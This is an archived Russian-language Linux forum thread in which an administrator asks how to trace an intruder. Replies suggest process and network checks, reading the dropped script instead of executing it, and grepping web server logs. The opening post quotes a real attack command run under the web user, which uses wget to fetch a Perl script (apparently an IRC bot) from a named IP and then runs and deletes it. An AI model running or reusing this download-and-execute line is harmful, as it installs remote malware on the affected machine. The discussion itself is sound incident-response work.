Атака

0

0

Всем привет!

Помогите разобраться. Кто-то вломился в систему.
Как выяснить, кто пытается запустить данный процесс? 
19715 www sh -c cd /tmp;wget http://84.244.2.24/mambus.txt;perl mambus.txt;rm -rf mambus.txt

Всем спасибо за помощь.
Владимир

Ссылка

←	Проблемы с фаерволом перенаправлние

запрет open proxy

→

в смысле, как выяснить владельца процесса?
ps axo 'pid ppid user command'

phoenix ★★★★
(23.03.06 18:44:40 MSK)

Что скажет нам netstat -t

~~Lumi~~ ★★★★★
(23.03.06 19:06:49 MSK)

Ответ на: комментарий от Lumi 23.03.06 19:06:49 MSK

PS: ничего не скажет, если уже отключились. Лучше скачать http://84.244.2.24/mambus.txt и посмотреть чего же именно наколбасили в системе.

~~Lumi~~ ★★★★★
(23.03.06 19:12:27 MSK)

Ответ на: комментарий от Lumi 23.03.06 19:12:27 MSK

netstat -t не помогает

anonymous
(23.03.06 19:30:40 MSK)

Ссылка

Ответ на: комментарий от phoenix 23.03.06 18:44:40 MSK

трудно проследить, потому как вызовешь эту команду, как оно уже отключается

anonymous
(23.03.06 20:24:36 MSK)

Ответ на: комментарий от anonymous 23.03.06 20:24:36 MSK

Вроде должен встать irc-bot на порт 65321, но чего-то они там не осиливают. И ^M там полно ;)

~~Lumi~~ ★★★★★
(23.03.06 20:55:50 MSK)

Ответ на: комментарий от Lumi 23.03.06 20:55:50 MSK

спасибо, проверю :-)
если у кого еще будут мысли, то добро пожаловать

anonymous
(23.03.06 22:09:40 MSK)

Ответ на: комментарий от anonymous 23.03.06 22:09:40 MSK

Умная мысль это -- less mambus.txt и ни в коем случае не perl mambus.txt

~~Lumi~~ ★★★★★
(23.03.06 22:37:40 MSK)

Ответ на: комментарий от Lumi 23.03.06 20:55:50 MSK

W ★★★★★
(23.03.06 23:19:03 MSK)

Ссылка

Ответ на: комментарий от Lumi 23.03.06 22:37:40 MSK

оно не может записать это филе мне в /tmp, поэтому нельзы выполнить ни less ни perl :-).

anonymous
(23.03.06 23:53:29 MSK)

Ответ на: комментарий от anonymous 23.03.06 23:53:29 MSK

Лучше ищи почему и как тебя поимели. В следующий раз подправят скриптик и будет им счастье. А так -- детишки какие-то побаловались безобидно.

~~Lumi~~ ★★★★★
(24.03.06 09:18:18 MSK)

Ссылка

Кто нибудь успел скачать mambus.txt ?

А то Connection refused.

bizon_art
(24.03.06 09:41:35 MSK)

Ответ на: комментарий от bizon_art 24.03.06 09:41:35 MSK

Давай адрес, кину -- 17кБ. А собственно говоря зачем? ;)

~~Lumi~~ ★★★★★
(24.03.06 09:47:50 MSK)

Ответ на: комментарий от Lumi 24.03.06 09:47:50 MSK

судя по www sh через web и поимели

anonymous
(24.03.06 10:23:38 MSK)

Ответ на: комментарий от anonymous 24.03.06 10:23:38 MSK

честно говоря, не пойму как

anonymous
(24.03.06 13:32:21 MSK)

Ответ на: комментарий от anonymous 24.03.06 13:32:21 MSK

Может grep`нуть логи web-сервера на предмет 'mambus'?

kmeaw ★★★
(25.03.06 17:50:31 MSK)

Ссылка

Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.

←	Проблемы с фаерволом перенаправлние

Admin

запрет open proxy

→

Похожие темы